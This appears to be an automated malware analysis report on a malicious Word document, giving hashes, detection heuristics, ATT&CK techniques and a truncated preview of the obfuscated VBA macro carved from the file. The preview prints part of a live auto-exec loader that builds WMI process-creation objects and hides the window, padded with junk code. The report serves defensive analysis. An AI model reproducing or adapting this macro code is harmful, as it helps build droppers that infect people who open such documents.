Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 04b73f13e9504f75…

MALICIOUS

Office (OLE)

207.0 KB Created: 2018-04-23 12:53:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: 7d687abc864f655eb82e17ade07fa0dc SHA-1: 587037596e7e4b845239709e8a1cb8f3fc35a5b9 SHA-256: 04b73f13e9504f75b98474a3d755497c88864c6081fa0ef1d87e50468b4168e6
262 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file contains heavily obfuscated VBA macros, including a Document_Open auto-exec loader, indicating malicious intent. The script attempts to use GetObject to download and execute a payload from a suspicious-looking string, which is likely the primary malicious function. ClamAV also detected this as a dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Emodldr-6755244-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 56836 bytes
SHA-256: a59c596b2846abd4d1ccb7f3ac649426b815e8193119c818e89e581327cb23d6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub TMxvI(VTmBmLb As String, FJtncc As String, vUnvtj As String, HeycP As String, NFizO As String, LRJPkMe As String)
    For XBYzeL = 0 To 194
        aydux = "SR#J%zQEPkxw_EC_T(c" + "cOkc#wt].kN" + "AzD)T&XjlheCv^m[Ld"
        fSlXK = Left("XndQiuD@?uS_WdAe", 4)
        aydux = StrReverse("s]nxO$yZ[XYSVz")
        mMQNurUb = 1314 + 1697 + 861
        JnbMpav = StrReverse("(h)Fw[axEcgkY")
        hLxuFYJO = UCase("@&Bi]!Nt&d]DYd")
        aydux = "nYA_p#tHc)yALB" + "bPo?jubTZr-]Rcn" + "kPCHzxfFB-!F"
        fSlXK = RTrim("yQiYw*)uYfWE")
        pSoJTqYE = UCase("FsPS@g$dh)Q")
        VGIgt = RTrim("w&BgVR[*gER&XWkyS")
    Next XBYzeL

    szAzrRUQ = Left("Ukrsi%q.MWn^uXzoodN", 5)
    hLxuFYJO = 839 - 1899 - 1879
    PDXZIXJ = 270 - 1437 - 723
    mMQNurUb = "^NP@lv&[T?" + ".JrX*nR$ipQ*ia" + "Cud]E$VIzE!V?^] hSQI"
    JnbMpav = StrReverse("U]NcXFnDUgDn-x")
    PDXZIXJ = Space(15)
    aydux = Space(2)
    Set ruhTFms = GetObject(SjQSOd("wsi%n-mzg]m*tHsU:B\r\w.i\_rEoYo tr\Pc*ijmHvt2#"))
    aydux = StrReverse("e^[q!(oYac@cwKI*")
    hLxuFYJO = Right("naABfLc!GWqKLMTcuyQl", 2)
    JnbMpav = UCase("jms[fiu.H KXbiO*")
    JnbMpav = RTrim("#dxytQCNZ_xXs")
    FkxmtZv = Space(2)
    szAzrRUQ = Space(15)
    hLxuFYJO = 1866 + 785 + 988
    While Lfqutn < 217
        mMQNurUb = LTrim("^vEKi(hCqkHTnjF")
        YltcGz = LTrim(" VmJMD?MdSw)NOojX#")
        FkxmtZv = "rxOQ)bwzy?nc" + ".(*k GTCq@^^O" + "_p] BvTFq&vu[cJ"
        VGIgt = "rUroBw?Pw@fNwmoPidH" + "PH.TXs$OiHWD)FVh  [" + "pE_ZbVFjHI[EfgCy&"
        fSlXK = "b-m.o*)I$y" + "y YJo-Lbn&RRs.V!" + "tvdK(zWQ!#SiR"
        szAzrRUQ = Space(4)
        FkxmtZv = Left("YW zjhR@ghkn", 2)
        nuKqm = 1215 - 1897 - 1579
        pSoJTqYE = Space(13)
        mMQNurUb = RTrim("eUxk[V n[XN$$]@A")
        Lfqutn = Lfqutn + 1
    Wend

    Set LFWzZJ = ruhTFms.Get(SjQSOd("W-iunl3&2W_%PTr$oXc.e sTsYS%tNaCrOtMugp."))
    fSlXK = LTrim("g#!Kb*)GOCRivdNv*V")
    hLxuFYJO = Right("#dFlSDNycb*&Jb", 2)
    JnbMpav = 847 + 1305 + 1210
    JnbMpav = Space(8)
    VGIgt = RTrim("VEeimfQlzqm?gzwddp-q")
    hLxuFYJO = Right("Y#FTgC^CB-l#yDHON", 4)
    JnbMpav = Space(3)
    aydux = "hb%nptVK_eZCd!bOu" + "hWw)cHGNDfZdlqRG@e-" + "GdC$$AiRwaf"
    Set USRZu = LFWzZJ.SpawnInstance_
    PDXZIXJ = Space(13)
    aydux = Right("S!TxaOqV#*.Bo^(", 3)
    While FZsTQN < 219
        fSlXK = Left("*WeJ)s^tCqObJ]]b", 3)
        VGIgt = 1494 - 1152 - 727
        szAzrRUQ = 566 + 1282 + 1323
        pSoJTqYE = Left("KoJR[%FGz yXalx", 2)
        VGIgt = Left("iWC*[_vDi&)MswP", 4)
        VGIgt = 423 - 395 - 1994
        FZsTQN = FZsTQN + 2
    Wend

    aydux = UCase("EJye]fYXSBld#S")
    YltcGz = UCase("CKWJbrD)kXbr^JzSMm")
    fSlXK = 1339 + 1711 + 432
    VGIgt = StrReverse("eJT@-(jcww%iEfqDu")
    For pZbCrX = 0 To 381
        nuKqm = StrReverse("skQL]xHWfa")
        hLxuFYJO = UCase("BFlcG%p$Sble")
    Next pZbCrX

    USRZu.ShowWindow = 0
    JnbMpav = StrReverse("t?ZE#Qo?El_v)YVXB")
    While LJGjUG < 315
        fSlXK = StrReverse("wLQI$dAX#G^Ny@XI#F!")
        PDXZIXJ = Left("sHvOBuzh(tEaZ]kZgd%", 4)
        hLxuFYJO = "LsTqVtpFgSMNMQ*" + "@PmeGX?a%FmmBLvMGZ" + "Vvai RRLLijbT-QVEq"
        FkxmtZv = Left("evi_bPOo$wp", 3)
        fSlXK = UCase("$OQ#lcr&NFkHj[zH([Q")
        LJGjUG = LJGjUG + 2
    Wend

    While djvMAp < 199
        hLxuFYJO = 1790 + 1226 + 744
        mMQNurUb = 360 + 1603 + 529
        szAzrRUQ = Right("dsi*oY?&CcM", 3)
        djvMAp = djvMAp + 3
    Wend

    hLxuFYJO = RTrim("zyS!LesQhKJy#C^")
    aydux = 179 - 459 - 218
    aydux = Space(1)
    JnbMpav = UCase("VYsI*zly^#QMCXyi")
    For PQQMri = 0 To 284
        mMQNurUb = UCase("ZnoFh#KdUsefcq%")
        YltcGz = LTrim("()Ol[JJ.n.[?u@")
    Next PQ
... (truncated)